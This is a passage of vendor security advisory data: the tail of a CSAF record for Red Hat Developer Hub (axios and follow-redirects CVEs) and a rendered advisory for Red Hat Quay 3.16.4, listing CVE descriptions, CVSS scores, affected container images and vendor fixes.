          "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:47c3fc5bfb21e980f0fa6c510c48c97982649c7f27d9d486a19391c56c9531ff_amd64",
          "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:7118207df52574eb4eb9a6b35aa23eef8029937c2ace807b5e132bcc5188a972_amd64"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
          "url": "https://access.redhat.com/security/cve/CVE-2026-40175"
        },
        {
          "category": "external",
          "summary": "RHBZ#2457432",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2457432"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2026-40175",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-40175"
        },
        {
          "category": "external",
          "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-40175",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-40175"
        },
        {
          "category": "external",
          "summary": "https://github.com/axios/axios/commit/363185461b90b1b78845dc8a99a1f103d9b122a1",
          "url": "https://github.com/axios/axios/commit/363185461b90b1b78845dc8a99a1f103d9b122a1"
        },
        {
          "category": "external",
          "summary": "https://github.com/axios/axios/pull/10660",
          "url": "https://github.com/axios/axios/pull/10660"
        },
        {
          "category": "external",
          "summary": "https://github.com/axios/axios/releases/tag/v1.15.0",
          "url": "https://github.com/axios/axios/releases/tag/v1.15.0"
        },
        {
          "category": "external",
          "summary": "https://github.com/axios/axios/security/advisories/GHSA-fvcv-3m26-pcqx",
          "url": "https://github.com/axios/axios/security/advisories/GHSA-fvcv-3m26-pcqx"
        }
      ],
      "release_date": "2026-04-10T19:23:52.285000+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2026-05-05T16:10:46+00:00",
          "details": "For more about Red Hat Developer Hub, see References links",
          "product_ids": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:80453720616cee369e9f79863ef1815a2741afdeb25d3572085d11ad54afa9a0_amd64"
          ],
          "restart_required": {
            "category": "none"
          },
          "url": "https://access.redhat.com/errata/RHSA-2026:13826"
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "attackComplexity": "HIGH",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 9.0,
            "baseSeverity": "CRITICAL",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "CHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H",
            "version": "3.1"
          },
          "products": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:80453720616cee369e9f79863ef1815a2741afdeb25d3572085d11ad54afa9a0_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:47c3fc5bfb21e980f0fa6c510c48c97982649c7f27d9d486a19391c56c9531ff_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:7118207df52574eb4eb9a6b35aa23eef8029937c2ace807b5e132bcc5188a972_amd64"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "details": "Important"
        }
      ],
      "title": "axios: Axios: Remote Code Execution via Prototype Pollution escalation"
    },
    {
      "cve": "CVE-2026-40895",
      "cwe": {
        "id": "CWE-212",
        "name": "Improper Removal of Sensitive Information Before Storage or Transfer"
      },
      "discovery_date": "2026-04-21T21:02:33.280553+00:00",
      "flags": [
        {
          "label": "vulnerable_code_not_present",
          "product_ids": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:47c3fc5bfb21e980f0fa6c510c48c97982649c7f27d9d486a19391c56c9531ff_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:7118207df52574eb4eb9a6b35aa23eef8029937c2ace807b5e132bcc5188a972_amd64"
          ]
        }
      ],
      "ids": [
        {
          "system_name": "Red Hat Bugzilla ID",
          "text": "2460297"
        }
      ],
      "notes": [
        {
          "category": "description",
          "text": "A flaw was found in follow-redirects. When an HTTP request follows a cross-domain redirect (a redirection to a different domain), custom authentication headers, such as X-API-Key or X-Auth-Token, are not properly stripped. This allows these sensitive headers to be forwarded verbatim to the redirect target, potentially leading to the unintended disclosure of authentication information to an untrusted third party.",
          "title": "Vulnerability description"
        },
        {
          "category": "summary",
          "text": "follow-redirects: follow-redirects: Information disclosure via cross-domain redirects",
          "title": "Vulnerability summary"
        },
        {
          "category": "general",
          "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
          "title": "CVSS score applicability"
        }
      ],
      "product_status": {
        "fixed": [
          "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:80453720616cee369e9f79863ef1815a2741afdeb25d3572085d11ad54afa9a0_amd64"
        ],
        "known_not_affected": [
          "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:47c3fc5bfb21e980f0fa6c510c48c97982649c7f27d9d486a19391c56c9531ff_amd64",
          "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:7118207df52574eb4eb9a6b35aa23eef8029937c2ace807b5e132bcc5188a972_amd64"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
          "url": "https://access.redhat.com/security/cve/CVE-2026-40895"
        },
        {
          "category": "external",
          "summary": "RHBZ#2460297",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2460297"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2026-40895",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-40895"
        },
        {
          "category": "external",
          "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-40895",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-40895"
        },
        {
          "category": "external",
          "summary": "https://github.com/follow-redirects/follow-redirects/security/advisories/GHSA-r4q5-vmmm-2653",
          "url": "https://github.com/follow-redirects/follow-redirects/security/advisories/GHSA-r4q5-vmmm-2653"
        }
      ],
      "release_date": "2026-04-21T19:59:59.759000+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2026-05-05T16:10:46+00:00",
          "details": "For more about Red Hat Developer Hub, see References links",
          "product_ids": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:80453720616cee369e9f79863ef1815a2741afdeb25d3572085d11ad54afa9a0_amd64"
          ],
          "restart_required": {
            "category": "none"
          },
          "url": "https://access.redhat.com/errata/RHSA-2026:13826"
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
            "version": "3.1"
          },
          "products": [
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:80453720616cee369e9f79863ef1815a2741afdeb25d3572085d11ad54afa9a0_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:47c3fc5bfb21e980f0fa6c510c48c97982649c7f27d9d486a19391c56c9531ff_amd64",
            "Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:7118207df52574eb4eb9a6b35aa23eef8029937c2ace807b5e132bcc5188a972_amd64"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "details": "Important"
        }
      ],
      "title": "follow-redirects: follow-redirects: Information disclosure via cross-domain redirects"
    }
  ]
}

RHSA-2026:19375

Vulnerability from csaf_redhat - Published: 2026-05-19 21:01 - Updated: 2026-06-30 15:49

Summary

Red Hat Security Advisory: Red Hat Quay 3.16.4

Severity

Important

Notes

Topic: Red Hat Quay 3.16.4 is now available with bug fixes.

Details: Quay 3.16.4

CVE-2025-61726

A flaw was found in the net/url package in the Go standard library. The package does not enforce a limit on the number of unique query parameters it parses. A Go application using the net/http.Request.ParseForm method will try to process all parameters provided in the request. A specially crafted HTTP request containing a massive number of query parameters will cause the application to consume an excessive amount of memory, eventually causing the application to crash or become unresponsive, resulting in a denial of service.

7.5 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CWE-770 - Allocation of Resources Without Limits or Throttling

Affected products

Fixed 4 products

Product	Version	Remediation
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:139cae64e4790ebf8b760c6376a33d15233222a25e4da39c6062d7e46c3a1bef_amd64	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:52883f389182907dec0e286d626c4faea0f4ae29a5d0e841d6ad2287fdb964c2_arm64	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:ad162e6ea2f6fd246f605180699ce36e4ea91c4b551c7af600a64e671a303ee9_s390x	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:f6a15c2f1b4d5900cdbd366080e40d3a90d51ba9e5b4d6196e15eefe69d902c3_ppc64le	—	Vendor Fix fix Workaround

Known not affected 19 products

Product	Version	Remediation
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:478f0e44eaf9907d18c8e765b16d80b9cc0bb3eac50ff8e118e3349aa29a9b46_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:4e7266596726edd7cde2b55bd7bed8910f4cbc1b310c11557e3552239ed3750f_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:f423a53dff70862980ee4381a9fe0fb5d19ce4d9932d7784491d057671d1fc2e_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:203097d7c260c95d7cf8e14a378542f75aae84f234a28d61d419f7b434562a9f_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:116b0249564f8424a5438e4a2edd0a9fa8c9449c4cea1ac1b642904d46dccf2f_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:68e02cfb3de2728a3f7f3cdd7b3ab231aa50ff51be51455bf1015ebc8addac66_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:f610987c52a000670dd5ba0a943f8d3ca38cdd71a0239a95b93260b4ce254b7b_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6c64c35079e0af57beeb1dec93cad23c91dbfca34d25ecdf6326cdf5d557e1b9_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:25be6b83e985ef60d32dec94f57f530b8a4be88c6f23627789f11eb4a0e8870b_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:34d0eac97f889384b67037fdf957e53c02c7ec2579e436e28f49b66d586062cf_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:8d71f18daf54d0311be34071b85d6f48c2895785c986e31a218cd748c443d60b_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:ae76dd5965cf14d53a81b5e88ec2f9406d12834a8f5fb1f3ee14fc3271ecceee_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2fc63e77e837796a5082b58defffc6c46a9a4e8038190c9b8f87213bdf46c006_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:622a11babb195484a89cad806b9b79b6a99df53ad6ebb3d3d68b0a97ded78f79_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9e77748984103da9604314a20f66f4fe9710f645dec385b1069ea20d9d0c6ed1_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:631c61a88de857bac8503386173a7689c462cfa07141969beb1ab958d85996a3_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:2c5d16299741b7ebcb712479d5c82bb4fa498c6e043786abbff4c52b982c4879_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:74cda2cf2b38b3cd62e5527e421dd7fbe756350e326e0b385ad9518302e08f03_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:e77909a680cd9586f86b793363ffcba2352d25b2c255e7608582e6e7a6659ff2_ppc64le	—	Workaround

Threats

Impact Important

CVE-2025-62718

7.0 (High)


                        
                          CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:L/A:L

CWE-1289 - Improper Validation of Unsafe Equivalence in Input

Affected products

Fixed 4 products

Product	Version	Remediation
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:139cae64e4790ebf8b760c6376a33d15233222a25e4da39c6062d7e46c3a1bef_amd64	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:52883f389182907dec0e286d626c4faea0f4ae29a5d0e841d6ad2287fdb964c2_arm64	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:ad162e6ea2f6fd246f605180699ce36e4ea91c4b551c7af600a64e671a303ee9_s390x	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:f6a15c2f1b4d5900cdbd366080e40d3a90d51ba9e5b4d6196e15eefe69d902c3_ppc64le	—	Vendor Fix fix Workaround

Known not affected 19 products

Product	Version	Remediation
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:478f0e44eaf9907d18c8e765b16d80b9cc0bb3eac50ff8e118e3349aa29a9b46_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:4e7266596726edd7cde2b55bd7bed8910f4cbc1b310c11557e3552239ed3750f_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:f423a53dff70862980ee4381a9fe0fb5d19ce4d9932d7784491d057671d1fc2e_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:203097d7c260c95d7cf8e14a378542f75aae84f234a28d61d419f7b434562a9f_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:116b0249564f8424a5438e4a2edd0a9fa8c9449c4cea1ac1b642904d46dccf2f_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:68e02cfb3de2728a3f7f3cdd7b3ab231aa50ff51be51455bf1015ebc8addac66_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:f610987c52a000670dd5ba0a943f8d3ca38cdd71a0239a95b93260b4ce254b7b_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6c64c35079e0af57beeb1dec93cad23c91dbfca34d25ecdf6326cdf5d557e1b9_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:25be6b83e985ef60d32dec94f57f530b8a4be88c6f23627789f11eb4a0e8870b_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:34d0eac97f889384b67037fdf957e53c02c7ec2579e436e28f49b66d586062cf_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:8d71f18daf54d0311be34071b85d6f48c2895785c986e31a218cd748c443d60b_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:ae76dd5965cf14d53a81b5e88ec2f9406d12834a8f5fb1f3ee14fc3271ecceee_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2fc63e77e837796a5082b58defffc6c46a9a4e8038190c9b8f87213bdf46c006_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:622a11babb195484a89cad806b9b79b6a99df53ad6ebb3d3d68b0a97ded78f79_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9e77748984103da9604314a20f66f4fe9710f645dec385b1069ea20d9d0c6ed1_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:631c61a88de857bac8503386173a7689c462cfa07141969beb1ab958d85996a3_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:2c5d16299741b7ebcb712479d5c82bb4fa498c6e043786abbff4c52b982c4879_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:74cda2cf2b38b3cd62e5527e421dd7fbe756350e326e0b385ad9518302e08f03_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:e77909a680cd9586f86b793363ffcba2352d25b2c255e7608582e6e7a6659ff2_ppc64le	—	Workaround

Threats

Impact Important

CVE-2026-2377

A flaw was found in Red Hat Quay and mirror registry for Red Hat OpenShift. The log export feature in these products allows an authenticated user to specify an arbitrary callback URL. A backend process then makes server-side HTTP requests to this provided URL. This vulnerability, known as Server-Side Request Forgery (SSRF), could allow an attacker to send requests from the application's internal network, potentially leading to the disclosure of sensitive information.

6.5 (Medium)


                        
                          CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

CWE-918 - Server-Side Request Forgery (SSRF)

Affected products

Fixed 4 products

Product	Version	Remediation
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:139cae64e4790ebf8b760c6376a33d15233222a25e4da39c6062d7e46c3a1bef_amd64	—	Vendor Fix fix
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:52883f389182907dec0e286d626c4faea0f4ae29a5d0e841d6ad2287fdb964c2_arm64	—	Vendor Fix fix
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:ad162e6ea2f6fd246f605180699ce36e4ea91c4b551c7af600a64e671a303ee9_s390x	—	Vendor Fix fix
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:f6a15c2f1b4d5900cdbd366080e40d3a90d51ba9e5b4d6196e15eefe69d902c3_ppc64le	—	Vendor Fix fix

Known not affected 19 products

Product	Identifier	Version	Remediation
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:478f0e44eaf9907d18c8e765b16d80b9cc0bb3eac50ff8e118e3349aa29a9b46_ppc64le		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:4e7266596726edd7cde2b55bd7bed8910f4cbc1b310c11557e3552239ed3750f_s390x		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:f423a53dff70862980ee4381a9fe0fb5d19ce4d9932d7784491d057671d1fc2e_amd64		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:203097d7c260c95d7cf8e14a378542f75aae84f234a28d61d419f7b434562a9f_amd64		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:116b0249564f8424a5438e4a2edd0a9fa8c9449c4cea1ac1b642904d46dccf2f_ppc64le		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:68e02cfb3de2728a3f7f3cdd7b3ab231aa50ff51be51455bf1015ebc8addac66_s390x		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:f610987c52a000670dd5ba0a943f8d3ca38cdd71a0239a95b93260b4ce254b7b_amd64		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6c64c35079e0af57beeb1dec93cad23c91dbfca34d25ecdf6326cdf5d557e1b9_amd64		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:25be6b83e985ef60d32dec94f57f530b8a4be88c6f23627789f11eb4a0e8870b_amd64		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:34d0eac97f889384b67037fdf957e53c02c7ec2579e436e28f49b66d586062cf_ppc64le		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:8d71f18daf54d0311be34071b85d6f48c2895785c986e31a218cd748c443d60b_s390x		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:ae76dd5965cf14d53a81b5e88ec2f9406d12834a8f5fb1f3ee14fc3271ecceee_amd64		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2fc63e77e837796a5082b58defffc6c46a9a4e8038190c9b8f87213bdf46c006_amd64		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:622a11babb195484a89cad806b9b79b6a99df53ad6ebb3d3d68b0a97ded78f79_ppc64le		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9e77748984103da9604314a20f66f4fe9710f645dec385b1069ea20d9d0c6ed1_s390x		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:631c61a88de857bac8503386173a7689c462cfa07141969beb1ab958d85996a3_amd64		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:2c5d16299741b7ebcb712479d5c82bb4fa498c6e043786abbff4c52b982c4879_s390x		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:74cda2cf2b38b3cd62e5527e421dd7fbe756350e326e0b385ad9518302e08f03_amd64		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:e77909a680cd9586f86b793363ffcba2352d25b2c255e7608582e6e7a6659ff2_ppc64le		—

Threats

Impact Important

CVE-2026-4427

No description is available for this CVE.

Affected products

Fixed 4 products

Product	Version	Remediation
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:139cae64e4790ebf8b760c6376a33d15233222a25e4da39c6062d7e46c3a1bef_amd64	—	Vendor Fix fix
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:52883f389182907dec0e286d626c4faea0f4ae29a5d0e841d6ad2287fdb964c2_arm64	—	Vendor Fix fix
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:ad162e6ea2f6fd246f605180699ce36e4ea91c4b551c7af600a64e671a303ee9_s390x	—	Vendor Fix fix
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:f6a15c2f1b4d5900cdbd366080e40d3a90d51ba9e5b4d6196e15eefe69d902c3_ppc64le	—	Vendor Fix fix

Known not affected 19 products

Product	Identifier	Version	Remediation
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:478f0e44eaf9907d18c8e765b16d80b9cc0bb3eac50ff8e118e3349aa29a9b46_ppc64le		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:4e7266596726edd7cde2b55bd7bed8910f4cbc1b310c11557e3552239ed3750f_s390x		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:f423a53dff70862980ee4381a9fe0fb5d19ce4d9932d7784491d057671d1fc2e_amd64		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:203097d7c260c95d7cf8e14a378542f75aae84f234a28d61d419f7b434562a9f_amd64		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:116b0249564f8424a5438e4a2edd0a9fa8c9449c4cea1ac1b642904d46dccf2f_ppc64le		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:68e02cfb3de2728a3f7f3cdd7b3ab231aa50ff51be51455bf1015ebc8addac66_s390x		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:f610987c52a000670dd5ba0a943f8d3ca38cdd71a0239a95b93260b4ce254b7b_amd64		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6c64c35079e0af57beeb1dec93cad23c91dbfca34d25ecdf6326cdf5d557e1b9_amd64		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:25be6b83e985ef60d32dec94f57f530b8a4be88c6f23627789f11eb4a0e8870b_amd64		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:34d0eac97f889384b67037fdf957e53c02c7ec2579e436e28f49b66d586062cf_ppc64le		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:8d71f18daf54d0311be34071b85d6f48c2895785c986e31a218cd748c443d60b_s390x		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:ae76dd5965cf14d53a81b5e88ec2f9406d12834a8f5fb1f3ee14fc3271ecceee_amd64		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2fc63e77e837796a5082b58defffc6c46a9a4e8038190c9b8f87213bdf46c006_amd64		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:622a11babb195484a89cad806b9b79b6a99df53ad6ebb3d3d68b0a97ded78f79_ppc64le		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9e77748984103da9604314a20f66f4fe9710f645dec385b1069ea20d9d0c6ed1_s390x		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:631c61a88de857bac8503386173a7689c462cfa07141969beb1ab958d85996a3_amd64		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:2c5d16299741b7ebcb712479d5c82bb4fa498c6e043786abbff4c52b982c4879_s390x		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:74cda2cf2b38b3cd62e5527e421dd7fbe756350e326e0b385ad9518302e08f03_amd64		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:e77909a680cd9586f86b793363ffcba2352d25b2c255e7608582e6e7a6659ff2_ppc64le		—

CVE-2026-4598

A flaw was found in jsrsasign. A remote attacker could exploit this vulnerability by providing specially crafted zero or negative inputs to the bnModInverse function within the BigInteger.modInverse implementation. This could lead to an infinite loop, causing a permanent denial of service (DoS) by hanging the process.

7.5 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CWE-1287 - Improper Validation of Specified Type of Input

Affected products

Fixed 4 products

Product	Version	Remediation
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:139cae64e4790ebf8b760c6376a33d15233222a25e4da39c6062d7e46c3a1bef_amd64	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:52883f389182907dec0e286d626c4faea0f4ae29a5d0e841d6ad2287fdb964c2_arm64	—	Vendor Fix fix Workaround
